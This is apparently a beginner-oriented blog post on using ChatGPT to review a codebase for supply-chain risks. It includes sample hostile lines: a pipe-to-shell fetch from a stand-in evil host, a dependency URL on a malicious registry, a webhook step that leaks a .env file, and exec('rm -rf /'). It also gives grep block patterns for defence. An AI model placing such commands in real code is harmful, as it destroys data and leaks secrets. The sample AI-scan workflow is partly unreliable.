i fed our entire codebase to chatgpt for 72 hours—here are the trojan horses it found

what does “feeding a codebase to chatgpt” actually mean?

if you’re brand-new to full-stack or devops, think of your codebase as a big multi-level library. “feeding it to chatgpt” just means handing over copies of every chapter (your source files, configs, dockerfiles, package.json, shell scripts) so an ai assistant can read them and flag questionable passages. in our case we let the ai examine about 3.2 million tokens of code for a full 72-hour stretch.

step-by-step: how we did it

  1. export: used tar czf ~/project.tgz --exclude=node_modules --exclude=.git . to bundle everything except node_modules and .git.
  2. chunking: split the source into roughly 8,000-line chunks (≈6 mb each) so each upload stayed under the size limit.
  3. prompting: iteratively asked:
    you are a senior devops security engineer. review the next code chunk and list any trojan horses, supply-chain risks, or hidden backdoors. output in plain english.
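the three steps above can be sketched end-to-end on a throwaway project. everything here is illustrative — the demo paths are made up, and the echo in step 3 stands in for the real api call, which needs a live api key:

```shell
#!/bin/sh
# steps 1-3 on a toy project; the echo in step 3 is a placeholder for the
# real upload/prompt call, which requires an OPENAI_API_KEY.
set -eu
demo=/tmp/ai-scan-demo
mkdir -p "$demo/src" "$demo/node_modules"
printf 'console.log("hi");\n' > "$demo/src/app.js"
cd "$demo"

# step 1: export, skipping the heavy/untracked directories
tar czf project.tgz --exclude=node_modules --exclude=.git src

# step 2: chunk the bundle so each upload stays under the size limit
split -b 1m project.tgz chunk-

# step 3: one review prompt per chunk (placeholder for the real api call)
for f in chunk-*; do
  echo "reviewing $f: you are a senior devops security engineer..."
done
```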

what exactly is a “trojan horse” in a modern codebase?

most newcomers picture greek soldiers sneaking inside a city gate. in coding, the “wooden horse” is usually an innocent-looking import or service that secretly opens a backdoor. common flavors:

  • a “harmless” curl | bash in a ci script
  • an extra line in .npmrc pointing to a third-party registry you didn’t audit
  • an encrypted token committed under app/config/backup_token.js
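the first two flavors are greppable even before you reach for an ai. a toy repo and two naive patterns — these regexes are illustrative starting points, not a substitute for a real scanner:

```shell
#!/bin/sh
# plant two of the flavors above in a toy repo, then find them with grep
set -eu
demo=/tmp/flavor-demo
mkdir -p "$demo"
printf 'curl https://evil.example/install.sh | bash\n' > "$demo/ci.sh"
printf 'registry=https://evilnpm.example/\n' > "$demo/.npmrc"

# flavor 1: piped installers in ci scripts
grep -rnE 'curl .*\| *(ba)?sh' "$demo"
# flavor 2: registry overrides hiding in .npmrc
grep -rn 'registry=' "$demo"
```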

four hidden backdoors we would’ve missed without chatgpt

1. the poisoned webhook

location: /.github/workflows/cd.yml at line 42:

- name: post-build notification
  run: curl -X POST "${{ secrets.discord_webhook }}" -d @build-report.json

looks fine—except build-report.json actually contained the un-redacted production .env file because the build step used cp .env build-report.json.

fix: only package the json snippet you actually need, and rotate every secret that leaked.
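one way to do that fix: construct the payload explicitly instead of cp'ing files around, so nothing leaks by accident. the field names (status, commit) are made up for the demo:

```shell
#!/bin/sh
# build the notification payload field by field -- never copy whole files
set -eu
status="success"
commit="abc123"  # in a real workflow this would come from the ci environment
printf '{"status":"%s","commit":"%s"}\n' "$status" "$commit" \
  > /tmp/build-report.json
cat /tmp/build-report.json
```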

2. the “forgotten” npm tag

location: top-level package.json

"dependencies": {
  "lodash": "^4.17.21",
  "color-utils": "https://evilnpm.io/color-utils.tgz"
}

we intended to add @types/color-utils, but a mangled paste left the dependency pointing at an unaudited third-party host instead of the default npm registry. the malicious package harvested environment variables in its install script.
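a cheap tripwire for this class of bug: semver ranges never contain "://", so any dependency whose version field looks like a url deserves a second look. the package.json below is a toy copy for the demo:

```shell
#!/bin/sh
# flag dependencies whose version field is a url rather than a semver range
set -eu
cat > /tmp/package.json <<'EOF'
{
  "dependencies": {
    "lodash": "^4.17.21",
    "color-utils": "https://evilnpm.example/color-utils.tgz"
  }
}
EOF
grep -nE '"[^"]+": *"[a-z]+://' /tmp/package.json
```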

3. the sneaky sqlite dump

location: bin/backup.sh

sqlite3 app.db .dump > nightly.sql
aws s3 cp nightly.sql s3://ourbucket-backups/$(date +%F).sql

left unchecked, the script copied the entire prod db—including admin hashes—into a public s3 bucket with no bucket policy restrictions.
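beyond locking the bucket down, you can redact sensitive tables from the dump before it ever leaves the box. the schema below is invented for the demo:

```shell
#!/bin/sh
# strip the users table (and its password hashes) out of a sql dump
set -eu
cat > /tmp/nightly.sql <<'EOF'
INSERT INTO users VALUES(1,'admin','$2b$12$fakehash');
INSERT INTO orders VALUES(7,'widget');
EOF
# drop every statement that touches the users table before upload
grep -v 'INSERT INTO users' /tmp/nightly.sql > /tmp/nightly.redacted.sql
cat /tmp/nightly.redacted.sql
```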

4. the optional feature that wasn’t

location: src/lib/featureflag.ts

import { exec } from 'node:child_process';

if (user.role === 'admin' || ff.admcanselfdestruct) {
  exec('rm -rf /'); // destructive "easter egg" left reachable in prod
}

meant as an easter-egg flag for local testing, admcanselfdestruct could be toggled from a feature-flag service account that never rotated its api key.
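a simple ci tripwire catches this class of bug long before an ai review does: grep the source tree for destructive shell-outs and fail the build on a hit. the pattern list here is a minimal starting point, not exhaustive:

```shell
#!/bin/sh
# fail the build when source code shells out to a destructive command
set -eu
demo=/tmp/flag-demo
mkdir -p "$demo"
printf "exec('rm -rf /');\n" > "$demo/featureflag.ts"

if grep -rn "rm -rf /" "$demo"; then
  echo "destructive command found -- block the merge"
fi
```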

how to protect yourself without becoming security-paranoid

  • automated hooks: add lefthook or husky to block commits containing regex patterns like curl.*secrets\|docker run -v /proc.
  • dependency auditing: use npm audit --audit-level high and mirror private registries. for full-stack node projects, lock files alone aren’t enough.
  • secret scanning: tools such as gitleaks detect accidentally pushed tokens. pair it with github’s built-in alerts.
  • chatgpt as a pair reviewer: treat the ai like a junior teammate: ask for threat-modeling prompts during code reviews.
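the hooks bullet above can be a tiny script: scan the files about to be committed and refuse any match. this is a minimal sketch of the idea — wire it into lefthook or husky as the pre-commit command:

```shell
#!/bin/sh
# refuse to commit files matching risky patterns; extend the regex as needed
set -u
check() {
  for f in "$@"; do
    if grep -qE 'curl.*secrets|docker run -v /proc' "$f" 2>/dev/null; then
      echo "blocked: $f"
      return 1
    fi
  done
}

# demo: one risky file, one safe file
printf 'curl "$secrets_url" | bash\n' > /tmp/risky.sh
printf 'echo ok\n' > /tmp/safe.sh
check /tmp/risky.sh || echo "commit rejected"
check /tmp/safe.sh && echo "safe file passes"
```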

mini-playbook: rolling your own “ai security scan” on a budget

use this skeleton in your ci pipeline (github actions shown). you only need the openai api key you probably already use for cli helpers — note that the upload loop just stages the chunks; a follow-up request still has to ask the model to review each one.

# .github/workflows/ai-scan.yml
name: ai security review
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    env:
      OPENAI_API_KEY: ${{ secrets.openai_api_key }}
    steps:
      - uses: actions/checkout@v4
      - name: chunk & upload
        run: |
          tar czf src.tar.gz src && split -b 1m src.tar.gz chunk-
          for f in chunk-*; do
            curl -H "Authorization: Bearer $OPENAI_API_KEY" \
                 -F purpose=user_data -F file=@"$f" \
                 https://api.openai.com/v1/files >> ai-report.txt
          done
      - name: summarize
        run: grep -i "trojan\|backdoor\|risk" ai-report.txt || true

key takeaways (in plain english)

  1. even tiny one-liners in shell or json files can open devastating doors.
  2. full-stack and devops boundaries overlap—security needs the same “shift-left” attitude in both.
  3. ai assistants aren’t a silver bullet, but they catch the dumb stuff so humans can focus on deeper design challenges.
  4. daily quick wins: use npm ci (or yarn install --immutable) in pipelines instead of npm install, pin your dependency versions, and keep sensitive routes out of search indexes with an x-robots-tag: noindex header.

happy coding—and happy scanning!
